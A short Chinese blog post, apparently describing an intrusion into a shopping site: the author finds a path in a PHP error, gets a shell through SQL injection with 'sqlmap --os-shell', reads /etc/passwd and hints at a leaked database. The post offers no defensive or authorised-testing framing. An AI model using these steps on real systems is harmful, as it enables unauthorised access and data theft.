Yuku's Blog

得到路径：

Notice: Undefined index: goods_name in /opt/lampp/htdocs/189mall/app/xxxxx/xxxx_xx.php on line 17

web application technology: Apache 2.4.7, PHP 5.4.25

back-end DBMS: MySQL 5.0

既然是Root就直接一点了，用sqlmap --os-shell命令获得一个交互的shell

服务器信息： 

'Linux localhost.localdomain 2.6.18-238.el5 #1 SMP Sun Dec 19 14:22:44 EST 2010 x86_64 x86_64 x86_64 GNU/Linux'

cat /etc/passwd

裤子侧漏 - -

【本文出自Yuku's Blog|】